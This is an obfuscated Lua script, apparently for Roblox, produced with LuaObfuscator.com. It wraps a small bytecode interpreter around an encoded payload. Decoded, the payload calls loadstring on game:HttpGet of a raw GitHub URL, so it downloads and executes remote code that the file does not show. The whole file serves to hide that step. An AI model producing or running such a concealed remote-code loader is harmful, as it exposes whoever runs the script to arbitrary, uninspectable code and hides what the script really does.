--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (3==v0) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v15=function(v23,v24,...)local v25=0;local v26;local v27;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;while true do if (v25==2) then v30=function()local v46,v47=v2(v23,v26,v26 + 2);v26=v26 + (6 -4);return (v47 * (69 + 187)) + v46;end;v31=nil;v31=function()local v48,v49,v50,v51=v2(v23,v26,v26 + (1587 -(846 + 738)));v26=v26 + 1 + 0 + 3;return (v51 * (42665803 -25888587)) + (v50 * (92392 -(27467 -(205 + 406)))) + (v49 * (7 + 249)) + v48;end;v32=nil;v25=3;end if (v25==0) then v26=1;v27=nil;v23=v5(v4(v23,5),"..",function(v38)if (v2(v38,2)==79) then v27=v1(v4(v38,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v3(v1(v38,16));if v27 then local v102=v6(v73,v27);v27=nil;return v102;else return v73;end break;end end end end);v28=nil;v25=1;end if (v25==4) then v35=nil;v35=function(...)return {...},v12("#",...);end;v36=nil;v36=function()local v52=1655 -(485 + 1170);local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==2) then v57=nil;v58=nil;v52=3;end if (v52==0) then v53=0 -0;v54=nil;v52=2 -1;end if (v52==4) then while true do if (v53~=2) then else local v98=700 -(285 + 415);local v99;while true do if (v98==(0 -0)) then v99=0;while true do if (v99~=0) then else local v109=0;while true do if (v109==(0 -0)) then v58=nil;v59=nil;v109=1796 -(1470 + 325);end if (v109~=1) then else v99=1;break;end end end if (v99~=1) then else v53=3;break;end end break;end end end if (v53==(1626 -(903 + 720))) then v60=nil;while true do local v103=0;local v104;while true do if (v103~=(0 + 0)) then else v104=0 + 0;while true do if (v104~=1) then else if (v54==(0 -0)) then local v112=0;local v113;local v114;while true do if (v112~=1) then else while true do if (v113==(0 + 0)) then v114=0;while true do if (v114~=(1 -0)) then else v57={};v54=1;break;end if (v114~=0) then else v55={};v56={};v114=3 -2;end end break;end end break;end if (v112~=(768 -(436 + 332))) then else v113=0;v114=nil;v112=1;end end end if (v54~=1) then else local v115=0 -0;local v116;while true do if ((1240 -(645 + 595))~=v115) then else v116=102 -(59 + 43);while true do if (v116==1) then v60={};v54=2;break;end if (v116~=0) then else local v147=0 -0;while true do if (v147~=(1731 -(871 + 860))) then else v58={v55,v56,nil,v57};v59=v31();v147=1;end if (v147~=1) then else v116=1 + 0;break;end end end end break;end end end break;end if (v104~=(0 + 0)) then else if (v54~=2) then else local v117=0;while true do if (v117~=(1 + 0)) then else for v125=2 -1,v31() do local v126=832 -(718 + 114);local v127;while true do if (v126==(1769 -(557 + 1212))) then v127=v29();if (v28(v127,1,528 -(277 + 250))~=(0 + 0)) then else local v156=0 -0;local v157;local v158;local v159;local v160;local v161;local v162;while true do if (v156~=(1 + 1)) then else v161=nil;v162=nil;v156=3;end if (v156==(0 + 0)) then v157=685 -(386 + 299);v158=nil;v156=1;end if (v156~=(7 -4)) then else while true do if (v157==(0 -0)) then v158=0 -0;v159=nil;v157=1;end if ((1 + 0)==v157) then v160=nil;v161=nil;v157=80 -(33 + 45);end if (v157~=2) then else v162=nil;while true do if (v158==(7 -5)) then while true do if (v159==3) then if (v28(v161,3,565 -(394 + 168))==(2 -1)) then v162[4]=v60[v162[10 -6]];end v55[v125]=v162;break;end if (v159==2) then local v182=0 -0;local v183;while true do if (v182==0) then v183=1504 -(336 + 1168);while true do if (v183==1) then v159=3;break;end if ((0 -0)==v183) then local v192=0;while true do if (v192~=0) then else local v193=0 -0;while true do if (v193~=0) then else if (v28(v161,1,3 -2)==(1 -0)) then v162[2]=v60[v162[469 -(283 + 184)]];end if (v28(v161,2,2)==1) then v162[876 -(854 + 19)]=v60[v162[3]];end v193=2 -1;end if (v193==(3 -2)) then v192=2 -1;break;end end end if (v192~=1) then else v183=1 + 0;break;end end end end break;end end end if (v159==(1 + 0)) then local v184=0 + 0;local v185;local v186;while true do if (v184==(1 + 0)) then while true do if (v185~=(0 -0)) then else v186=0 + 0;while true do if (1==v186) then v159=4 -2;break;end if ((0 + 0)~=v186) then else v162={v30(),v30(),nil,nil};if (v160==(0 + 0)) then local v196=0 -0;local v197;while true do if (v196==0) then v197=0;while true do if (v197~=0) then else v162[797 -(688 + 106)]=v30();v162[11 -7]=v30();break;end end break;end end elseif (v160==1) then v162[287 -(210 + 74)]=v31();elseif (v160==(486 -(161 + 323))) then v162[3]=v31() -(2^(212 -(4 + 192)));elseif (v160==(8 -5)) then local v207=1070 -(977 + 93);local v208;while true do if ((321 -(174 + 147))==v207) then v208=0 + 0;while true do if (v208~=0) then else v162[2 + 1]=v31() -((1 + 1)^16);v162[4]=v30();break;end end break;end end end v186=1;end end break;end end break;end if (v184~=0) then else v185=0;v186=nil;v184=741 -(724 + 16);end end end if (0==v159) then local v187=0;local v188;local v189;while true do if (v187~=(0 + 0)) then else v188=886 -(386 + 500);v189=nil;v187=1;end if (v187~=(947 -(482 + 464))) then else while true do if (v188==(0 + 0)) then v189=0 -0;while true do if (v189==1) then v159=1 + 0;break;end if (v189~=0) then else local v194=335 -(50 + 285);local v195;while true do if (v194==0) then v195=0;while true do if (v195==(0 + 0)) then local v204=0 + 0;while true do if (v204~=0) then else v160=v28(v127,2,3);v161=v28(v127,7 -3,6);v204=1 + 0;end if (v204~=(4 -3)) then else v195=434 -(172 + 261);break;end end end if (v195~=(819 -(777 + 41))) then else v189=1;break;end end break;end end end end break;end end break;end end end end break;end if ((1 -0)==v158) then local v177=0;while true do if (v177==(3 -2)) then v158=3 -1;break;end if (v177==(1129 -(348 + 781))) then v161=nil;v162=nil;v177=94 -(53 + 40);end end end if (v158~=0) then else v159=0 + 0;v160=nil;v158=1215 -(1141 + 73);end end break;end end break;end if (v156==1) then v159=nil;v160=nil;v156=2;end end end break;end end end v54=3;break;end if (v117==0) then for v128=1 + 0,v59 do local v129=0 -0;local v130;local v131;local v132;while true do if (v129==(1876 -(1365 + 510))) then v132=nil;while true do if (v130==0) then local v164=1538 -(1353 + 185);while true do if (v164~=0) then else v131=v29();v132=nil;v164=1;end if (v164~=(3 -2)) then else v130=1524 -(853 + 670);break;end end end if (v130~=1) then else if (v131==(2 -1)) then v132=v29()~=(0 + 0);elseif (v131==2) then v132=v32();elseif (v131==(3 + 0)) then v132=v33();end v60[v128]=v132;break;end end break;end if (v129~=0) then else v130=0 + 0;v131=nil;v129=1;end end end v58[7 -4]=v29();v117=1;end end end if (v54==3) then local v118=0 + 0;local v119;while true do if (v118~=0) then else v119=0;while true do local v133=0;while true do if (v133~=0) then else if (v119~=(2 -1)) then else return v58;end if ((0 -0)~=v119) then else local v163=0 + 0;while true do if (v163~=(1727 -(1691 + 35))) then else v119=4 -3;break;end if (v163==(0 + 0)) then for v172=680 -(549 + 130),v31() do v56[v172-(1 + 0)]=v36();end for v174=1 + 0,v31() do v57[v174]=v31();end v163=1;end end end break;end end end break;end end end v104=899 -(359 + 539);end end break;end end end break;end if (v53==1) then v56=nil;v57=nil;v53=2;end if (v53~=(0 -0)) then else local v100=0 + 0;local v101;while true do if (0==v100) then v101=677 -(347 + 330);while true do if (v101~=0) then else local v110=0 + 0;while true do if (v110~=(2 -1)) then else v101=1;break;end if (v110==0) then v54=1761 -(1193 + 568);v55=nil;v110=1;end end end if (v101==1) then v53=1;break;end end break;end end end end break;end if (v52==3) then v59=nil;v60=nil;v52=6 -2;end if (v52~=1) then else v55=nil;v56=nil;v52=1 + 1;end end end;v25=5;end if (v25==1) then v28=function(v39,v40,v41)if v41 then local v74=1256 -(24 + 1232);local v75;while true do if (v74==(0 + 0)) then v75=(v39/((1 + 1)^(v40-1)))%((1 + 1)^(((v41-(226 -(128 + 97))) -(v40-(1876 -(203 + 1672)))) + 1 + (0 -0)));return v75-(v75%((345 -(20 + 324)) + 0));end end else local v76=0;local v77;while true do if (v76==(0 -(0 + 0))) then v77=(6 -4)^(v40-(1 + 0));return (((v39%(v77 + v77))>=v77) and (1 + 0)) or ((2169 -988) -(539 + 642));end end end end;v29=nil;v29=function()local v61=0 -0;local v62;while true do if (v61==(0 + (1856 -(436 + 1420)))) then v62=v2(v23,v26,v26);v26=v26 + 1;v61=3 -2;end if (v61==(1 + 0)) then return v62;end end end;v30=nil;v25=2;end if (v25==3) then v32=function()local v63=v31();local v64=v31();return (( -((2131 -(932 + 417)) -(640 + 140)) * v28(v64,1967 -(1697 + 238))) + ((1 + 0) -0)) * ((2 -0)^(v28(v64,1517 -(1128 + 368),1157 -(237 + 889)) -(626 + 397))) * ((((v28(v64,290 -(161 + 128),(17 + 32) -29) * ((493 -(239 + 252))^(64 -32))) + v63)/(((4 + 3) -5)^(21 + 31))) + (1371 -(1358 + 12)));end;v33=nil;v33=function(v42)local v65;if  not v42 then v42=v31();if (v42==(0 -0)) then return "";end end v65=v4(v23,v26,(v26 + v42) -(1296 -(632 + 663)));v26=v26 + v42;local v66={};for v70=1, #v65 do v66[v70]=v3(v2(v4(v65,v70,v70)));end return v7(v66);end;v34=v31;v25=4;end if (v25==5) then v37=nil;v37=function(v43,v44,v45)local v67=v43[1];local v68=v43[2];local v69=v43[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v83=v67;local v84=v68;local v85=v69;local v86=v35;local v87={};local v88={};local v89={};for v94=0,v81 do if ((((135 -71) + 3129)>(1606 + 478 + 35)) and (v94>=v85)) then v87[v94-v85]=v80[v94 + (1036 -(716 + 319))];else v89[v94]=v80[v94 + 1 + 0];end end local v90=(v81-v85) + (1323 -(424 + 898));local v91;local v92;while true do local v95=0 + 0;local v96;local v97;while true do if (((12647 -7965)>(3426 -1186)) and (v95==(353 -(186 + 166)))) then while true do if ((228<(744 + 516)) and (v96==(0 -0))) then v97=0 + 0;while true do if (((2141 -(154 + 438))>=(1542 -(48 + 1260))) and (v97==(4 -3))) then if ((v92<=(2 -0)) or ((3705 -(1246 + 681))>(5215 -2594))) then if ((v92<=(0 -0)) or ((170 + 426)==1509)) then local v123=0;local v124;while true do if ((v123==(0 -0)) or ((2883 -(1144 + 217))<(638 + 318))) then v124=v91[1509 -((3006 -(814 + 1077)) + 136 + 256)];v89[v124]=v89[v124](v13(v89,v124 + 1 + 0,v79));break;end end elseif ((v92==1) or ((2262 -(433 + 1467))==(2231 -((726 -(91 + 61)) + 1008)))) then v89[v91[2]]=v45[v91[1221 -(888 + 330)]];else do return;end end elseif ((v92<=4) or ((2190 + 1661)<=((8672 -6302) -(265 + 720 + 294)))) then if ((4906>(180 + 393)) and (v92>(1 + 2))) then v89[v91[433 -(242 + 189)]]=v91[14 -11];else local v138=0;local v139;local v140;local v141;local v142;local v143;while true do if ((v138==((50 -(24 + 26)) -0)) or (2111>(5072 -(473 + 561 + 819)))) then local v150=0 -0;while true do if ((v150==(180 -(6 + 174))) or ((1485 -(98 + 175))>(2834 -(181 + 1394)))) then v139=(0 -0) -0;v140=nil;v150=1;end if (((239 -(51 + 54))<=(653 + 1102)) and (1==v150)) then v138=(1399 -(164 + 1233)) -1;break;end end end if (((1 -0)==v138) or ((11852 -8812)<2386)) then v141=nil;v142=nil;v138=(646 -(419 + 226)) + 1;end if (((1489 -(22 + 22))<(4900 -2961)) and (v138==(1259 -(750 + 507)))) then v143=nil;while true do if ((((4399 -(394 + 66)) + 472)>(3840 -(148 + 623))) and (v139==(1323 -(373 + 948)))) then for v169=v140,v79 do local v170=289 -(287 + 2);local v171;while true do if ((v170==(1621 -(1521 + (180 -(62 + 18))))) or ((3338 + 420)<=(2771 -(136 + 58)))) then v171=(2497 -1301) -(802 + 394);while true do if ((v171==(1736 -(685 + 1051))) or ((27 + 28)==(2833 -(778 + 138)))) then v143=v143 + (366 -(267 + 98));v89[v169]=v141[v143];break;end end break;end end end break;end if (((11348 -7478)>(2870 -(12 + (1060 -(211 + 772))))) and (v139==(0 -0))) then local v166=0 -(0 + 0);local v167;while true do if ((v166==(0 -0)) or (2938>(6707 -(791 + 1050)))) then v167=0 + 0 + 0;while true do if (((634 + 1405)>(2708 -(607 + 86))) and ((1 + 0)==v167)) then v139=754 -(746 + 7);break;end if ((1731==(3505 -(1493 + 281))) and (v167==(0 + 0))) then local v176=0;while true do if ((v176==((0 + 0) -0)) or (1848>(4756 -(403 + 143)))) then v140=v91[2];v141,v142=v86(v89[v140](v13(v89,v140 + 1,v91[933 -(925 + 5)])));v176=261 -(59 + 201);end if ((v176==1) or ((12441 -9839)==(195 + 866 + 1080))) then v167=1359 -(1103 + 255);break;end end end end break;end end end if (((4068 -2437)==(4899 -3268)) and (v139==(1210 -(515 + 694)))) then local v168=0;while true do if (((2975 -(471 + 675))<(10006 -5408)) and (v168==((2 + 2) -3))) then v139=2 + 0;break;end if (((7736 -(13265 -8101))<(3873 -(342 + 144))) and (v168==(0 + 0))) then v79=(v142 + v140) -1;v143=0 -0;v168=3 -2;end end end end break;end end end elseif (((592 + 2346)>(3609 -(389 + 335))) and (v92==5)) then v89[v91[2 + (0 -0)]]();else local v144=752 -(259 + 493);local v145;local v146;while true do if ((v144==(1 + 0)) or (((7256 -(836 + 486)) -3119)>(4954 -(1509 + 226)))) then v89[v145 + (1646 -(1064 + 581))]=v146;v89[v145]=v146[v91[1625 -(991 + 630)]];break;end if ((v144==0) or (2503==(7646 -4891))) then v145=v91[(700 -(280 + 416)) -2];v146=v89[v91[1 + 2]];v144=406 -(125 + 280);end end end v78=v78 + 1 + 0;break;end if (((0 + 0)==v97) or ((5484 -(636 + 97))<(4527 -(768 + 697)))) then local v111=1163 -(658 + 505);while true do if ((v111==(0 + 0)) or ((4683 -(1193 + 261))==(5498 -(82 + 658)))) then v91=v83[v78];v92=v91[1811 -(495 + 1315)];v111=1 + 0 + 0;end if (((8406 -5424)<=(2068 + 2420)) and (((1 + 0) -0)==v111)) then v97=(1425 -(768 + 656)) + 0;break;end end end end break;end end break;end if ((v95==((1880 -(304 + 700)) -(559 + 317))) or (((1897 + 1591) -(358 + 226))<=(1431 -(594 + (366 -273))))) then v96=0 -0;v97=nil;v95=3 -2;end end end end A,B=v35(v11(v82));if  not A[1] then local v93=v43[4][v78] or "?";error("Script error at ["   .. v93   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end;return v37(v36(),{},v24)(...);end end end;v0=4;end if (v0==2) then v9=getfenv or function()return _ENV;end;v10=setmetatable;v11=pcall;v12=select;v0=3;end if (v0==4) then v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F726F626C6F786261642O31343531342F472O4F9O444O442F6D61696E2F2O3F7A6800083O0012013O00013O001201000100023O002006000100010003001204000300044O0003000100039O0000022O00053O000100012O00023O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);break;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end end end
